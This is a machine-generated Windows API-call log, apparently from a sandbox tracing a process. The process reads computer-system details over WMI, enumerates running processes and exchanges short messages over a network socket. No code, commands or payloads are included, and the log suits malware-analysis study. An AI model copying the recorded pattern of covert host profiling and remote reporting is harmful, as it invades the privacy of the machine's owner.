	[0263.457] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.457] IWbemClassObject:Get (in: This=0x635e398, wszName="__SUPERCLASS", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e614*=0, plFlavor=0x316e618*=0 | out: pVal=0x5dee744*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e614*=8, plFlavor=0x316e618*=64) returned 0x0
	[0263.457] IWbemClassObject:Get (in: This=0x635e398, wszName="__DYNASTY", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e63c*=0, plFlavor=0x316e640*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x316e63c*=8, plFlavor=0x316e640*=64) returned 0x0
	[0263.457] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.457] IWbemClassObject:Get (in: This=0x635e398, wszName="__RELPATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e6a0*=0, plFlavor=0x316e6a4*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x316e6a0*=8, plFlavor=0x316e6a4*=64) returned 0x0
	[0263.457] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0263.458] IWbemClassObject:Get (in: This=0x635e398, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e724*=0, plFlavor=0x316e728*=0 | out: pVal=0x5dee744*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x316e724*=3, plFlavor=0x316e728*=64) returned 0x0
	[0263.458] IWbemClassObject:Get (in: This=0x635e398, wszName="__DERIVATION", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e758*=0, plFlavor=0x316e75c*=0 | out: pVal=0x5dee744*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7f8598*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x639a1f8, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x316e758*=8200, plFlavor=0x316e75c*=64) returned 0x0
	[0263.458] IWbemClassObject:Get (in: This=0x635e398, wszName="__SERVER", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e790*=0, plFlavor=0x316e794*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x316e790*=8, plFlavor=0x316e794*=64) returned 0x0
	[0263.458] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0263.458] IWbemClassObject:Get (in: This=0x635e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e7dc*=0, plFlavor=0x316e7e0*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x316e7dc*=8, plFlavor=0x316e7e0*=64) returned 0x0
	[0263.458] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.459] IWbemClassObject:Get (in: This=0x635e398, wszName="__PATH", lFlags=0, pVal=0x5dee744*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e82c*=0, plFlavor=0x316e830*=0 | out: pVal=0x5dee744*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x316e82c*=8, plFlavor=0x316e830*=64) returned 0x0
	[0263.459] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0263.459] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6362088, puCount=0x5dee7c4 | out: puCount=0x5dee7c4*=0x2) returned 0x0
	[0263.459] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee7c0*=0x0, pszText=0x0 | out: puBuffLength=0x5dee7c0*=0x17, pszText=0x0) returned 0x0
	[0263.459] WbemDefPath:IWbemPath:GetText (in: This=0x6362088, lFlags=4, puBuffLength=0x5dee7c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee7c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.459] IWbemClassObject:Get (in: This=0x635e398, wszName="Manufacturer", lFlags=0, pVal=0x5dee780*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e930*=0, plFlavor=0x316e934*=0 | out: pVal=0x5dee780*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x316e930*=8, plFlavor=0x316e934*=32) returned 0x0
	[0263.459] SysStringLen (param_1="CLEVO") returned 0x5
	[0263.459] IWbemClassObject:Get (in: This=0x635e398, wszName="Manufacturer", lFlags=0, pVal=0x5dee838*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x316e930*=8, plFlavor=0x316e934*=32 | out: pVal=0x5dee838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x316e930*=8, plFlavor=0x316e934*=32) returned 0x0
	[0263.459] SysStringLen (param_1="CLEVO") returned 0x5
	[0263.460] send (s=0x420, buf=0x316f350*, len=32, flags=0) returned 32
	[0263.460] GetLastError () returned 0x0
	[0263.460] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 90
	[0264.219] GetLastError () returned 0x0
	[0264.220] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0264.415] send (s=0x420, buf=0x3187970*, len=27, flags=0) returned 27
	[0264.415] GetLastError () returned 0x0
	[0264.415] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 122
	[0265.210] GetLastError () returned 0x0
	[0265.211] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0265.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.224] GetLastError () returned 0xcb
	[0265.506] EnumProcesses (in: lpidProcess=0x31a4198, cb=0x400, lpcbNeeded=0x5dee688 | out: lpidProcess=0x31a4198, lpcbNeeded=0x5dee688) returned 1
	[0265.510] GetLastError () returned 0x0
	[0265.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3ad82b8, Length=0x20000, ResultLength=0x5dee608 | out: SystemInformation=0x3ad82b8, ResultLength=0x5dee608*=0xeac8) returned 0x0
	[0265.934] send (s=0x420, buf=0x3203d98*, len=22, flags=0) returned 22
	[0265.935] GetLastError () returned 0x0
	[0265.935] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 77
	[0266.221] GetLastError () returned 0x0
	[0266.222] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0266.311] send (s=0x420, buf=0x3211588*, len=25, flags=0) returned 25
	[0266.311] GetLastError () returned 0x0
	[0266.312] recv (in: s=0x420, buf=0x310c8f8, len=502, flags=0 | out: buf=0x310c8f8*) returned 122
	[0267.216] GetLastError () returned 0x0
	[0267.217] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0267.218] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee70c | out: ppv=0x5dee70c*=0x718dec) returned 0x0
	[0267.219] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee704 | out: pAptType=0x5dee704*=1) returned 0x0
	[0267.219] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee708 | out: ppvObject=0x5dee708*=0x0) returned 0x80004002
	[0267.219] IUnknown:Release (This=0x718dec) returned 0x1
	[0267.219] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee224 | out: ppv=0x5dee224*=0x635dee8) returned 0x0
	[0267.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee054 | out: ppvObject=0x5dee054*=0x0) returned 0x80004002
	[0267.219] WbemDefPath:IClassFactory:CreateInstance (in: This=0x635dee8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee08c | out: ppvObject=0x5dee08c*=0x63650b0) returned 0x0
	[0267.220] WbemDefPath:IUnknown:QueryInterface (in: This=0x63650b0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede30 | out: ppvObject=0x5dede30*=0x63650b0) returned 0x0
	[0267.220] WbemDefPath:IUnknown:QueryInterface (in: This=0x63650b0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddec | out: ppvObject=0x5deddec*=0x0) returned 0x80004002
	[0267.220] WbemDefPath:IUnknown:AddRef (This=0x63650b0) returned 0x3
	[0267.220] CoGetContextToken (in: pToken=0x5dedc78 | out: pToken=0x5dedc78) returned 0x0
	[0267.220] WbemDefPath:IUnknown:QueryInterface (in: This=0x63650b0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc60 | out: ppvObject=0x5dedc60*=0x639c3c0) returned 0x0
	[0267.221] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x639c3c0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc68 | out: pCid=0x5dedc68*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.221] WbemDefPath:IUnknown:Release (This=0x639c3c0) returned 0x3
	[0267.221] CoGetContextToken (in: pToken=0x5dedc70 | out: pToken=0x5dedc70) returned 0x0
	[0267.221] WbemDefPath:IUnknown:AddRef (This=0x63650b0) returned 0x4
	[0267.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x63650b0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedce4 | out: ppvObject=0x5dedce4*=0x0) returned 0x80004002
	[0267.221] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x3
	[0267.221] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x2
	[0267.222] WbemDefPath:IUnknown:Release (This=0x635dee8) returned 0x0
	[0267.222] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x1
	[0267.222] CoGetContextToken (in: pToken=0x5dee520 | out: pToken=0x5dee520) returned 0x0
	[0267.222] CoGetContextToken (in: pToken=0x5dee4e0 | out: pToken=0x5dee4e0) returned 0x0
	[0267.222] WbemDefPath:IUnknown:AddRef (This=0x63650b0) returned 0x2
	[0267.222] WbemDefPath:IUnknown:QueryInterface (in: This=0x63650b0, riid=0x5dee55c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee558 | out: ppvObject=0x5dee558*=0x63650b0) returned 0x0
	[0267.222] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x2
	[0267.222] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x1
	[0267.222] CoGetContextToken (in: pToken=0x5dee5a0 | out: pToken=0x5dee5a0) returned 0x0
	[0267.222] CoGetContextToken (in: pToken=0x5dee560 | out: pToken=0x5dee560) returned 0x0
	[0267.223] WbemDefPath:IUnknown:AddRef (This=0x63650b0) returned 0x2
	[0267.223] WbemDefPath:IUnknown:QueryInterface (in: This=0x63650b0, riid=0x5dee5dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5d8 | out: ppvObject=0x5dee5d8*=0x63650b0) returned 0x0
	[0267.223] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x2
	[0267.223] WbemDefPath:IUnknown:AddRef (This=0x63650b0) returned 0x3
	[0267.223] WbemDefPath:IWbemPath:SetText (This=0x63650b0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.223] WbemDefPath:IUnknown:Release (This=0x63650b0) returned 0x2
	[0267.223] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee744 | out: puCount=0x5dee744*=0x2) returned 0x0
	[0267.223] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee740*=0x0, pszText=0x0 | out: puBuffLength=0x5dee740*=0x17, pszText=0x0) returned 0x0
	[0267.223] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee740*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee740*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.223] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee740 | out: puCount=0x5dee740*=0x2) returned 0x0
	[0267.223] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee73c*=0x0, pszText=0x0 | out: puBuffLength=0x5dee73c*=0x17, pszText=0x0) returned 0x0
	[0267.223] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=4, puBuffLength=0x5dee73c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee73c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.224] CoGetObjectContext (in: riid=0x2cbad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6bc | out: ppv=0x5dee6bc*=0x718dec) returned 0x0
	[0267.224] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6b4 | out: pAptType=0x5dee6b4*=1) returned 0x0
	[0267.224] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6b8 | out: ppvObject=0x5dee6b8*=0x0) returned 0x80004002
	[0267.224] IUnknown:Release (This=0x718dec) returned 0x1
	[0267.224] CoGetClassObject (in: rclsid=0x7b796c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee50c | out: ppv=0x5dee50c*=0x635dcc8) returned 0x0
	[0267.224] WbemLocator:IUnknown:QueryInterface (in: This=0x635dcc8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee33c | out: ppvObject=0x5dee33c*=0x0) returned 0x80004002
	[0267.224] WbemLocator:IClassFactory:CreateInstance (in: This=0x635dcc8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x635dee8) returned 0x0
	[0267.225] WbemLocator:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee118 | out: ppvObject=0x5dee118*=0x635dee8) returned 0x0
	[0267.225] WbemLocator:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dee0d4 | out: ppvObject=0x5dee0d4*=0x0) returned 0x80004002
	[0267.225] WbemLocator:IUnknown:AddRef (This=0x635dee8) returned 0x3
	[0267.225] CoGetContextToken (in: pToken=0x5dedf60 | out: pToken=0x5dedf60) returned 0x0
	[0267.225] WbemLocator:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedf48 | out: ppvObject=0x5dedf48*=0x0) returned 0x80004002
	[0267.226] CoGetContextToken (in: pToken=0x5dedf58 | out: pToken=0x5dedf58) returned 0x0
	[0267.226] WbemLocator:IUnknown:AddRef (This=0x635dee8) returned 0x4
	[0267.226] WbemLocator:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedfcc | out: ppvObject=0x5dedfcc*=0x0) returned 0x80004002
	[0267.226] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x3
	[0267.226] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x2
	[0267.226] WbemLocator:IUnknown:Release (This=0x635dcc8) returned 0x0
	[0267.226] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x1
	[0267.226] CoGetContextToken (in: pToken=0x5dee464 | out: pToken=0x5dee464) returned 0x0
	[0267.227] CoGetContextToken (in: pToken=0x5dee424 | out: pToken=0x5dee424) returned 0x0
	[0267.227] WbemLocator:IUnknown:AddRef (This=0x635dee8) returned 0x2
	[0267.227] WbemLocator:IUnknown:QueryInterface (in: This=0x635dee8, riid=0x5dee4a0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dee49c | out: ppvObject=0x5dee49c*=0x635dee8) returned 0x0
	[0267.227] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x2
	[0267.227] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x1
	[0267.227] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63650b0, puCount=0x5dee694 | out: puCount=0x5dee694*=0x2) returned 0x0
	[0267.227] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=8, puBuffLength=0x5dee690*=0x0, pszText=0x0 | out: puBuffLength=0x5dee690*=0x17, pszText=0x0) returned 0x0
	[0267.227] WbemDefPath:IWbemPath:GetText (in: This=0x63650b0, lFlags=8, puBuffLength=0x5dee690*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee690*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.227] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5dee16c | out: ppv=0x5dee16c*=0x635def8) returned 0x0
	[0267.227] WbemLocator:IWbemLocator:ConnectServer (in: This=0x635def8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5dee1b8 | out: ppNamespace=0x5dee1b8*=0x635e99c) returned 0x0
	[0267.330] WbemLocator:IUnknown:QueryInterface (in: This=0x635e99c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee088 | out: ppvObject=0x5dee088*=0x7f96ac) returned 0x0
	[0267.330] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7f96ac, pProxy=0x635e99c, pAuthnSvc=0x5dee0d0, pAuthzSvc=0x5dee0cc, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4, pImpLevel=0x5dee0c0, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8 | out: pAuthnSvc=0x5dee0d0*=0xa, pAuthzSvc=0x5dee0cc*=0x0, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4*=0x6, pImpLevel=0x5dee0c0*=0x2, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8*=0x1) returned 0x0
	[0267.330] WbemLocator:IUnknown:Release (This=0x7f96ac) returned 0x1
	[0267.330] WbemLocator:IUnknown:QueryInterface (in: This=0x635e99c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee07c | out: ppvObject=0x5dee07c*=0x7f96cc) returned 0x0
	[0267.330] WbemLocator:IUnknown:QueryInterface (in: This=0x635e99c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee078 | out: ppvObject=0x5dee078*=0x7f96ac) returned 0x0
	[0267.330] WbemLocator:IClientSecurity:SetBlanket (This=0x7f96ac, pProxy=0x635e99c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0267.331] WbemLocator:IUnknown:Release (This=0x7f96ac) returned 0x2
	[0267.331] WbemLocator:IUnknown:Release (This=0x7f96cc) returned 0x1
	[0267.331] CoTaskMemFree (pv=0x7f8588) 
	[0267.331] WbemLocator:IUnknown:Release (This=0x635def8) returned 0x0
	[0267.331] WbemLocator:IUnknown:QueryInterface (in: This=0x635e99c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5deda38 | out: ppvObject=0x5deda38*=0x7f96cc) returned 0x0
	[0267.331] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ded9f4 | out: ppvObject=0x5ded9f4*=0x0) returned 0x80004002
	[0267.332] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x0) returned 0x80004002
	[0267.338] WbemLocator:IUnknown:AddRef (This=0x7f96cc) returned 0x3
	[0267.338] CoGetContextToken (in: pToken=0x5ded880 | out: pToken=0x5ded880) returned 0x0
	[0267.338] WbemLocator:IUnknown:QueryInterface (in: This=0x7f96cc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded868 | out: ppvObject=0x5ded868*=0x7f962c) returned 0x0
	[0267.338] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f962c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded870 | out: pCid=0x5ded870*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
